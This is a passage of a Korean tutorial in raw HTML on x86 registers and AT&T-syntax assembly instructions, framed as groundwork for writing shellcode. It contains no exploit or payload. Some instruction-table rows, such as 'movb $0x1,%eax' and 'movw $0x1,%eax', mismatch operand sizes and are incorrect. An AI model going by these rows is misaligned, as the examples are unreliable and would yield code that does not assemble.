&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; fs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; edi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ebp <br \/>&nbsp; &nbsp; &nbsp;&nbsp; esp &nbsp; &nbsp; &nbsp; &nbsp; <br \/><br \/>ax,bx,cx,dx\ub294 data\ub97c \uc9c1\uc811 \ucc98\ub9ac\ud558\ub294 \ub808\uc9c0\uc2a4\ud130\ub85c data\uc758 \ud06c\uae30\uc5d0 \ub530\ub77c 1\ubc14\uc774\ud2b8, 2\ubc14\uc774\ud2b8, 4\ubc14\uc774\ud2b8\ub85c&nbsp; <br \/>\ub098\ub204\uc5b4 \uc0ac\uc6a9\ud560 \uc218\ub3c4 \uc788\ub2e4. \uc989 ax\ub294 2\ubc14\uc774\ud2b8\uc778\ub370 al(1\ubc14\uc774\ud2b8) + ah(1\ubc14\uc774\ud2b8)\ub85c \ub098\ub204\uc5b4 \uc4f8\uc218\uc788\uc73c\uba70&nbsp; <br \/>al\uc740 ax\uc758 \ub0ae\uc740\ucabd 1\ubc14\uc774\ud2b8(8\ube44\ud2b8), ah\uc740 \ub192\uc740\ucabd 1\ubc14\uc774\ud2b8(8\ube44\ud2b8)\ub97c \uc758\ubbf8\ud55c\ub2e4. \ub610\ud55c ax\uc55e\uc5d0 e\ub97c \ubd99\uc774\uba74&nbsp; <br \/>4\ubc14\uc774\ud2b8\ub85c\uc758 \ud655\uc7a5\uc744 \uc758\ubbf8\ud55c\ub2e4.&nbsp; \uc774\uac83\uc744 \ub3c4\uc2dd\ud654 \ud558\uba74 <br \/><br \/>&nbsp;&nbsp; +----+----+----+----+ <br \/>&nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp;| &nbsp; eax &nbsp;&nbsp; ( 4\ubc14\uc774\ud2b8, 32\ube44\ud2b8,&nbsp; 0 ~ 0xffffffff ) <br \/>&nbsp;&nbsp; +----+----+----+----+ <br \/>&nbsp;&nbsp; | &nbsp; &nbsp; &nbsp;| &nbsp;&nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ax &nbsp; &nbsp; ( 2\ubc14\uc774\ud2b8, 16\ube44\ud2b8,&nbsp; 0 ~ 0xffff ) <br \/>&nbsp;&nbsp; +----+----+ <br \/>&nbsp;&nbsp; |&nbsp; al&nbsp; | ah | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; al,ah&nbsp; ( 1\ubc14\uc774\ud2b8,&nbsp; 8\ube44\ud2b8,&nbsp; 0 ~ 0xff ) <br \/>&nbsp;&nbsp; +----+----+ <br \/><br \/>&nbsp;&nbsp; 4\ubc14\uc774\ud2b8 &nbsp; | &nbsp; 2\ubc14\uc774\ud2b8&nbsp; &nbsp;|&nbsp; 1\ubc14\uc774\ud2b8 <br \/>&nbsp;&nbsp; ---------+-----------+--------- <br \/>&nbsp; &nbsp; eax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; ax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; al , ah <br \/>&nbsp; &nbsp; ebx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bl , bh <br \/>&nbsp; &nbsp; ecx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; cx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; cl , ch <br \/>&nbsp; &nbsp; edx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dx &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dl , dh <br \/><br \/>\uc774\ub807\uac8c data\ucc98\ub9ac \ub808\uc9c0\uc2a4\ud130\uc758 \ud06c\uae30\ub97c \ub098\ub204\uc5b4 \uc4f0\ub294 \uac83\uc740 \ud6a8\uc728\uc801\uc778 \uad00\ub9ac\uce21\uba74\uc5d0\uc11c\ub3c4 \uc758\ubbf8\uac00 \uc788\uaca0\uc9c0\ub9cc&nbsp; <br \/>shellcode\uc81c\uc791\uc2dc\uc5d4 NULL(0x00)\ucc98\ub9ac\uc744 \uc704\ud574 \uc911\uc694\ud558\ub2e4. \uc880\ub354 \uad6c\uccb4\uc801\uc778 \ubd80\ubd84\uc740 \ucc28\ucc28 \uc124\uba85\ud558\uae30\ub85c \ud55c\ub2e4. <br \/><br \/>esi,edi,ebp,esp\uc5d0 \ub300\ud574\uc11c \uc54c\uc544\ubcf4\uc790. si\ub294 source index, di\ub294 destination index\uc758 \uc57d\uc790\ub85c \ud544\uc694\uc2dc <br \/>\ubc30\uc5f4 \ucc38\uc870\ud560\ub54c \uc0ac\uc6a9\ud558\ub294 \ub808\uc9c0\uc2a4\ud2b8\ub9ac \uc815\ub3c4\ub85c \uc774\ud574 \ud558\uba74 \ub420\uac70 \uac19\uace0, esp\ub294&nbsp; stack pointer\ub85c \ud504\ub85c\uadf8\ub7a8 <br \/>\uc774 \uc9c4\ud589 \ub418\ub294 \ub3d9\uc548 stack\uc758 \ucd5c\uc885 \uc8fc\uc18c\ub97c \uc800\uc7a5\ud558\ub294 \uacf3\uc774\ub2e4. \ud504\ub85c\uadf8\ub7a8\uc774 \uc9c4\ud589\uc774\ub780 \uc758\ubbf8\ub294 \uc2a4\ud0dd\uc5d0 data <br \/>\uac00 \uc800\uc7a5\ub418\uace0 \ube60\uc9c0\ub294 \ub3d9\uc548 \uacc4\uc18d \ubcc0\uacbd\ub41c\ub2e4\ub294 \uac83\uc744 \uc758\ubbf8\ud55c\ub2e4. \uc774\ub807\uac8c esp\uac00 \uacc4\uc18d \ubcc0\uacbd\ub418\ubbc0\ub85c \ud55c \ud568\uc218 <br \/>(frame) \ub0b4\uc5d0\uc11c stack\uc758 \uae30\uc900 \uc8fc\uc18c\ub97c \uc124\uc815\ud558\uac8c \ub418\ub294\ub370 \uc774\uac83\uc774 ebp(base pointer, frame pointer)&nbsp; <br \/>\uc774\ub2e4. \uadf8\ub7ec\ubbc0\ub85c \uc77c\ubc18\uc801\uc73c\ub85c \ud568\uc218 \ub0b4\uc5d0\uc11c \uccab\ubc88\uc9f8\ub85c \ud558\ub294 \uc77c\uc774 \uae30\uc874 ebp\ub97c \uc800\uc7a5(pushl %ebp)\ud558\uace0 \ucd08\uae30 <br \/>\uc758 esp\ub97c ebp\ub85c \uc124\uc815(movl %esp %ebp)\ud558\ub294 \uc791\uc5c5\uc744 \ud55c\ub2e4. \ub4a4\uc5d0 \uc2e4\uc81c \ud504\ub85c\uadf8\ub7a8\ub0b4\uc5d0\uc11c \uc880\ub354 \uc0c1\uc138\ud788&nbsp; <br \/>\uc774\ud574 \ud558\ub3c4\ub85d \ud558\uc790. <br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac \uad6c\uc870\uc640 \uae30\ubcf8 \uba85\ub839\uc5b4&gt; <br \/>\uc5b4\uc148\ube14\ub9ac\uc758 \uae30\ubcf8 \uad6c\uc870\ub294 \uc544\ub798\uc640 \uac19\uc774 5\uac1c\uc758 \uc601\uc5ed(\ubd80\ubd84)\uc73c\ub85c&nbsp; \ub098\ub204\uc5b4\uc838 \uc788\uc73c\uba70, Linux\uc758 \uacbd\uc6b0\uc5d0\ub294&nbsp; <br \/>AT&amp;T syntax\ub97c \ub530\ub974\uae30 \ub54c\ubb38\uc5d0 \uc624\ud53c\ucf54\ub4dc\uc758 \uba85\ub839\uc774 \uc81c1\uc624\ud53c\ub79c\ub4dc\uc5d0\uc11c \uc81c2\uc624\ud53c\ub79c\ub4dc\ucabd\uc73c\ub85c \uc791\uc6a9\ud55c\ub2e4. <br \/>\uc989 \uc544\ub798\uc758 \uc608\uc81c\uc758 \uacbd\uc6b0 %esi\uc758 \uac12\uc774 %ebp\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub41c\ub2e4. <br \/><br \/><\/P>\n\n<TABLE style=\"WIDTH: 325pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=431 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 41pt; mso-width-source: userset; mso-width-alt: 1536\" width=54>\n<COL style=\"WIDTH: 65pt; mso-width-source: userset; mso-width-alt: 2446\" width=86>\n<COL style=\"WIDTH: 74pt; mso-width-source: userset; mso-width-alt: 2787\" width=98>\n<COL style=\"WIDTH: 69pt; mso-width-source: userset; mso-width-alt: 2616\" width=92>\n<COL style=\"WIDTH: 76pt; mso-width-source: userset; mso-width-alt: 2872\" width=101>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 41pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 width=54><FONT size=2><STRONG>\ub77c\ubca8 <\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 65pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=86><FONT size=2><STRONG>\uc624\ud53c\ucf54\ub4dc &nbsp;<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 74pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=98><FONT size=2><STRONG>\uc81c1\uc624\ud53c\ub79c\ub4dc<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 69pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=92><FONT size=2><STRONG>\uc81c2\uc624\ud53c\ub79c\ub4dc<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 76pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 width=101><STRONG><FONT size=2>\uc124\uba85\ubb38(\uc8fc\uc11d)<\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18><FONT size=2>main:<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>movl<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>%esi, <\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>%ebp &nbsp; &nbsp; &nbsp; &nbsp;<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25><FONT size=2>; comment<\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P><br \/><br \/>\ub77c\ubca8\uc740 \uc9c1\uc811 \uae30\uacc4\uc5b4\ub85c \ubc88\uc5ed\ub418\uc9c0 \uc54a\uace0 \ubd84\uae30\uba85\ub839(jmp, call)\ub4f1\uc5d0\uc11c \ucc38\uc870\ub418\uc5b4 \uc8fc\uc18c\uc758 \uacc4\uc0b0\uc5d0 \uc0ac\uc6a9\ub41c\ub2e4. <br \/>\uc624\ud53c\ucf54\ub4dc\ub294 \uba85\ub839\uc5b4\uc774\uba70 \uc81c1 &amp; 2 \uc624\ud53c\ub79c\ub4dc\ub294 \ud544\uc694\ud55c \uc778\uc218\ub4e4\uc774\ub2e4.. \uc624\ud53c\ub79c\ub4dc\ub294 \uc624\ud53c\ucf54\ub4dc\uc5d0 \ub530\ub77c \ud55c\uac1c <br \/>\ud639\uc740 2\uac1c\ub97c \uc0ac\uc6a9\ud560\uc218 \uc788\ub2e4.&nbsp; \uae30\ubcf8 \uc624\ud53c\ucf54\ub4dc(\uba85\ub839\uc5b4)\uc5d0 \ub300\ud558\uc5ec \uc758\ubbf8\uc640 \uc0ac\uc6a9\ubc95\uc744 \uc54c\uc544\ubcf4\uc790. Linux\uc5d0\uc11c <br \/>\ub294 AT&amp;T syntax\uc744 \ub530\ub974\uae30 \ub54c\ubb38\uc5d0 \uc774\uc5d0 \uc900\ud558\uc5ec \uc124\uba85\ud558\uaca0\ub2e4. <br \/><\/P>\n\n<TABLE style=\"WIDTH: 378pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=503 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 41pt; mso-width-source: userset; mso-width-alt: 1536\" width=54>\n<COL style=\"WIDTH: 102pt; mso-width-source: userset; mso-width-alt: 3868\" width=136>\n<COL style=\"WIDTH: 128pt; mso-width-source: userset; mso-width-alt: 4835\" width=170>\n<COL style=\"WIDTH: 107pt; mso-width-source: userset; mso-width-alt: 4067\" width=143>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 41pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18 width=54><FONT size=2><STRONG>\uba85\ub839\uc5b4<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 102pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=136 x:str=\" \uc774\uc6a9 \ubc29\ubc95 \"><FONT size=2><STRONG><SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>\uc774\uc6a9 \ubc29\ubc95<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 128pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=170 x:str=\" \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 \"><FONT size=2><STRONG><SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>\uba85\ub839\uc5b4\uc758 \uc758\ubbf8<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 107pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=143 x:str=\" C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 \"><STRONG><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN>C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" mov \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>mov<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movb $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movb $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x01 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x01<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; <\/FONT><\/SPAN><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movw $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movw $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x0001 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x0001<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" \"><SPAN style=\"mso-spacerun: yes\"><FONT size=2>&nbsp; &nbsp; &nbsp; <\/FONT><\/SPAN><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" movl $0x1,%eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>movl $0x1,%eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8) \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8)<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = 0x00000001 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = 0x00000001<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" add \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>add<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" addl $1, %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>addl $1, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \ub354\ud558\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \ub354\ud558\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = eax + 1 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = eax + 1<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" sub \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>sub<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" subl $1, %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>subl $1, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = eax - 1 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = eax - 1<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" inc \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>inc<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" incl %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>incl %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \uc99d\uac00. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \uc99d\uac00.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax++ \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax++<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" dec \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>dec<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD 